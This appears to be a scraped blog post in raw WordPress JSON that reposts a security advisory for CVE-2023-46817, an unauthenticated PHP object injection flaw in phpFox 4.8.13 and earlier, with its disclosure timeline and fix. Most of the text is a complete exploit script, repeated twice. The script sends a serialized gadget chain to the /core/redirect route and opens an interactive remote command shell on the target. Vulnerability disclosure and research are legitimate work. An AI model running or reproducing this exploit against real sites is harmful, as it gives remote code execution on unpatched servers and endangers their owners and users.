————————————————————–\nphpFox <= 4.8.13 (redirect) PHP Object Injection Vulnerability\n————————————————————–<\/p>\n[-] Software Link:<\/p>\n
Social Network Platform for Online Community Builders<\/a><\/p><\/blockquote>\n<\/iframe><\/p>\n[-] Affected Versions:<\/p>\n<p>Version 4.8.13 and prior versions.<\/p>\n[-] Vulnerability Description:<\/p>\n<p>User input passed through the “url” request parameter to the<br \/>\n\/core\/redirect route is not properly sanitized before being used in a<br \/>\ncall to the unserialize() PHP function. This can be exploited by remote,<br \/>\nunauthenticated attackers to inject arbitrary PHP objects into the<br \/>\napplication scope, allowing them to perform a variety of attacks, such<br \/>\nas executing arbitrary PHP code.<\/p>\n[-] Proof of Concept:<\/p>\n<p>https:\/\/karmainsecurity.com\/pocs\/CVE-2023-46817.php<\/p>\n<p>(Packet Storm note: POC included at bottom)<\/p>\n[-] Solution:<\/p>\n<p>Upgrade to version 4.8.14 or later.<\/p>\n[-] Disclosure Timeline:<\/p>\n[05\/10\/2023] – Vendor contacted through https:\/\/clients.phpfox.com<br \/>\n[05\/10\/2023] – Vendor response stating “we currently do not have such<br \/>\nsecurity requirements”<br \/>\n[06\/10\/2023] – CVE identifier requested<br \/>\n[09\/10\/2023] – Vulnerability details shared with the vendor, stating the<br \/>\nissue is quite critical<br \/>\n[17\/10\/2023] – Vendor contacted again, asking for an update<br \/>\n[18\/10\/2023] – Vendor response stating “this issue is fixed in our<br \/>\nlatest version (4.8.13)”, but that’s not the truth<br \/>\n[26\/10\/2023] – Version 4.8.14 released<br \/>\n[27\/10\/2023] – CVE identifier assigned<br \/>\n[27\/10\/2023] – Public disclosure<\/p>\n[-] CVE Reference:<\/p>\n<p>The Common Vulnerabilities and Exposures project (cve.mitre.org)<br \/>\nhas assigned the name CVE-2023-46817 to this vulnerability.<\/p>\n[-] Credits:<\/p>\n<p>Vulnerability discovered by Egidio Romano.<\/p>\n[-] Original Advisory:<\/p>\n<p>https:\/\/karmainsecurity.com\/KIS-2023-12<\/p>\n[-] Other References:<\/p>\n<p>https:\/\/docs.phpfox.com\/display\/FOX4MAN\/phpFox+4.8.14<\/p>\n<p>— CVE-2023-46817.php poc —<\/p>\n<p><?php<\/p>\n<p>\/*<br \/>\n————————————————————–<br \/>\nphpFox <= 4.8.13 (redirect) PHP Object Injection Vulnerability<br \/>\n————————————————————–<\/p>\n<p>author…………..: Egidio Romano aka EgiX<br \/>\nmail…………….: n0b0d13s[at]gmail[dot]com<br \/>\nsoftware link…….: https:\/\/www.phpfox.com<\/p>\n<p>+————————————————————————-+<br \/>\n| This proof of concept code was written for educational purpose only. |<br \/>\n| Use it at your own risk. Author will be not responsible for any damage. |<br \/>\n+————————————————————————-+<\/p>\n[-] Vulnerability Description:<\/p>\n<p>User input passed through the “url” request parameter to the \/core\/redirect route is<br \/>\nnot properly sanitized before being used in a call to the unserialize() PHP function.<br \/>\nThis can be exploited by remote, unauthenticated attackers to inject arbitrary PHP<br \/>\nobjects into the application scope, allowing them to perform a variety of attacks,<br \/>\nsuch as executing arbitrary PHP code.<\/p>\n[-] Original Advisory:<\/p>\n<p>https:\/\/karmainsecurity.com\/KIS-2023-12<br \/>\n*\/<\/p>\n<p>set_time_limit(0);<br \/>\nerror_reporting(E_ERROR);<\/p>\n<p>if (!extension_loaded(“curl”)) die(“[+] cURL extension required!\\n”);<\/p>\n<p>print “+——————————————————————+\\n”;<br \/>\nprint “| phpFox <= 4.8.13 (redirect) PHP Object Injection Exploit by EgiX |\\n”;<br \/>\nprint “+——————————————————————+\\n”;<\/p>\n<p>if ($argc != 2) die(“\\nUsage: php $argv[0] <URL>\\n\\n”);<\/p>\n<p>function encode($string)<br \/>\n{<br \/>\n$string = addslashes(gzcompress($string, 9));<br \/>\nreturn urlencode(strtr(base64_encode($string), ‘+\/=’, ‘-_,’));<br \/>\n}<\/p>\n<p>class Phpfox_Request<br \/>\n{<br \/>\nprivate $_sName = “EgiX”;<br \/>\nprivate $_sPluginRequestGet = “print ‘_____’; passthru(base64_decode(\\$_SERVER[‘HTTP_CMD’])); print ‘_____’; die;”;<br \/>\n}<\/p>\n<p>class Core_Objectify<br \/>\n{<br \/>\nprivate $__toString;<\/p>\n<p>function __construct($callback)<br \/>\n{<br \/>\n$this->__toString = $callback;<br \/>\n}<br \/>\n}<\/p>\n<p>print “\\n[+] Launching shell on {$argv[1]}\\n”;<\/p>\n<p>$popChain = serialize(new Core_Objectify([new Phpfox_Request, “get”]));<br \/>\n$popChain = str_replace(‘Core_Objectify’, ‘Core\\Objectify’, $popChain);<\/p>\n<p>$ch = curl_init();<\/p>\n<p>curl_setopt($ch, CURLOPT_URL, “{$argv[1]}index.php\/core\/redirect”);<br \/>\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br \/>\ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<br \/>\ncurl_setopt($ch, CURLOPT_POSTFIELDS, “url=”.encode($popChain));<\/p>\n<p>while(1)<br \/>\n{<br \/>\nprint “\\nphpFox-shell# “;<br \/>\nif (($cmd = trim(fgets(STDIN))) == “exit”) break;<br \/>\ncurl_setopt($ch, CURLOPT_HTTPHEADER, [“CMD: “.base64_encode($cmd)]);<br \/>\npreg_match(“\/_____(.*)_____\/s”, curl_exec($ch), $m) ? print $m[1] : die(“\\n[+] Exploit failed!\\n”);<br \/>\n}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>————————————————————– phpFox <= 4.8.13 (redirect) PHP Object Injection Vulnerability ————————————————————– [-] Software Link: Social Network Platform for Online Community Builders [-] Affected Versions: Version 4.8.13 and prior versions. [-] Vulnerability Description: User input passed through the “url” request parameter to the \/core\/redirect route is not properly sanitized before being used in a call to the …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-50647","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50647","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=50647"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50647\/revisions"}],"predecessor-version":[{"id":50760,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50647\/revisions\/50760"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=50647"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=50647"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=50647"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
<\/iframe><\/p>\n[-] Affected Versions:<\/p>\n<p>Version 4.8.13 and prior versions.<\/p>\n[-] Vulnerability Description:<\/p>\n<p>User input passed through the “url” request parameter to the<br \/>\n\/core\/redirect route is not properly sanitized before being used in a<br \/>\ncall to the unserialize() PHP function. This can be exploited by remote,<br \/>\nunauthenticated attackers to inject arbitrary PHP objects into the<br \/>\napplication scope, allowing them to perform a variety of attacks, such<br \/>\nas executing arbitrary PHP code.<\/p>\n[-] Proof of Concept:<\/p>\n<p>https:\/\/karmainsecurity.com\/pocs\/CVE-2023-46817.php<\/p>\n<p>(Packet Storm note: POC included at bottom)<\/p>\n[-] Solution:<\/p>\n<p>Upgrade to version 4.8.14 or later.<\/p>\n[-] Disclosure Timeline:<\/p>\n[05\/10\/2023] – Vendor contacted through https:\/\/clients.phpfox.com<br \/>\n[05\/10\/2023] – Vendor response stating “we currently do not have such<br \/>\nsecurity requirements”<br \/>\n[06\/10\/2023] – CVE identifier requested<br \/>\n[09\/10\/2023] – Vulnerability details shared with the vendor, stating the<br \/>\nissue is quite critical<br \/>\n[17\/10\/2023] – Vendor contacted again, asking for an update<br \/>\n[18\/10\/2023] – Vendor response stating “this issue is fixed in our<br \/>\nlatest version (4.8.13)”, but that’s not the truth<br \/>\n[26\/10\/2023] – Version 4.8.14 released<br \/>\n[27\/10\/2023] – CVE identifier assigned<br \/>\n[27\/10\/2023] – Public disclosure<\/p>\n[-] CVE Reference:<\/p>\n<p>The Common Vulnerabilities and Exposures project (cve.mitre.org)<br \/>\nhas assigned the name CVE-2023-46817 to this vulnerability.<\/p>\n[-] Credits:<\/p>\n<p>Vulnerability discovered by Egidio Romano.<\/p>\n[-] Original Advisory:<\/p>\n<p>https:\/\/karmainsecurity.com\/KIS-2023-12<\/p>\n[-] Other References:<\/p>\n<p>https:\/\/docs.phpfox.com\/display\/FOX4MAN\/phpFox+4.8.14<\/p>\n<p>— CVE-2023-46817.php poc —<\/p>\n<p><?php<\/p>\n<p>\/*<br \/>\n————————————————————–<br \/>\nphpFox <= 4.8.13 (redirect) PHP Object Injection Vulnerability<br \/>\n————————————————————–<\/p>\n<p>author…………..: Egidio Romano aka EgiX<br \/>\nmail…………….: n0b0d13s[at]gmail[dot]com<br \/>\nsoftware link…….: https:\/\/www.phpfox.com<\/p>\n<p>+————————————————————————-+<br \/>\n| This proof of concept code was written for educational purpose only. |<br \/>\n| Use it at your own risk. Author will be not responsible for any damage. |<br \/>\n+————————————————————————-+<\/p>\n[-] Vulnerability Description:<\/p>\n<p>User input passed through the “url” request parameter to the \/core\/redirect route is<br \/>\nnot properly sanitized before being used in a call to the unserialize() PHP function.<br \/>\nThis can be exploited by remote, unauthenticated attackers to inject arbitrary PHP<br \/>\nobjects into the application scope, allowing them to perform a variety of attacks,<br \/>\nsuch as executing arbitrary PHP code.<\/p>\n[-] Original Advisory:<\/p>\n<p>https:\/\/karmainsecurity.com\/KIS-2023-12<br \/>\n*\/<\/p>\n<p>set_time_limit(0);<br \/>\nerror_reporting(E_ERROR);<\/p>\n<p>if (!extension_loaded(“curl”)) die(“[+] cURL extension required!\\n”);<\/p>\n<p>print “+——————————————————————+\\n”;<br \/>\nprint “| phpFox <= 4.8.13 (redirect) PHP Object Injection Exploit by EgiX |\\n”;<br \/>\nprint “+——————————————————————+\\n”;<\/p>\n<p>if ($argc != 2) die(“\\nUsage: php $argv[0] <URL>\\n\\n”);<\/p>\n<p>function encode($string)<br \/>\n{<br \/>\n$string = addslashes(gzcompress($string, 9));<br \/>\nreturn urlencode(strtr(base64_encode($string), ‘+\/=’, ‘-_,’));<br \/>\n}<\/p>\n<p>class Phpfox_Request<br \/>\n{<br \/>\nprivate $_sName = “EgiX”;<br \/>\nprivate $_sPluginRequestGet = “print ‘_____’; passthru(base64_decode(\\$_SERVER[‘HTTP_CMD’])); print ‘_____’; die;”;<br \/>\n}<\/p>\n<p>class Core_Objectify<br \/>\n{<br \/>\nprivate $__toString;<\/p>\n<p>function __construct($callback)<br \/>\n{<br \/>\n$this->__toString = $callback;<br \/>\n}<br \/>\n}<\/p>\n<p>print “\\n[+] Launching shell on {$argv[1]}\\n”;<\/p>\n<p>$popChain = serialize(new Core_Objectify([new Phpfox_Request, “get”]));<br \/>\n$popChain = str_replace(‘Core_Objectify’, ‘Core\\Objectify’, $popChain);<\/p>\n<p>$ch = curl_init();<\/p>\n<p>curl_setopt($ch, CURLOPT_URL, “{$argv[1]}index.php\/core\/redirect”);<br \/>\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br \/>\ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<br \/>\ncurl_setopt($ch, CURLOPT_POSTFIELDS, “url=”.encode($popChain));<\/p>\n<p>while(1)<br \/>\n{<br \/>\nprint “\\nphpFox-shell# “;<br \/>\nif (($cmd = trim(fgets(STDIN))) == “exit”) break;<br \/>\ncurl_setopt($ch, CURLOPT_HTTPHEADER, [“CMD: “.base64_encode($cmd)]);<br \/>\npreg_match(“\/_____(.*)_____\/s”, curl_exec($ch), $m) ? print $m[1] : die(“\\n[+] Exploit failed!\\n”);<br \/>\n}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>————————————————————– phpFox <= 4.8.13 (redirect) PHP Object Injection Vulnerability ————————————————————– [-] Software Link: Social Network Platform for Online Community Builders [-] Affected Versions: Version 4.8.13 and prior versions. [-] Vulnerability Description: User input passed through the “url” request parameter to the \/core\/redirect route is not properly sanitized before being used in a call to the …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-50647","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50647","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=50647"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50647\/revisions"}],"predecessor-version":[{"id":50760,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50647\/revisions\/50760"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=50647"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=50647"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=50647"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}